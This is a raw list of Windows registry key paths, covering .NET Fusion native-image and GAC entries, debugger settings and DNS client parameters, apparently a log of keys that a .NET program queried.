HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus\FontCachePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
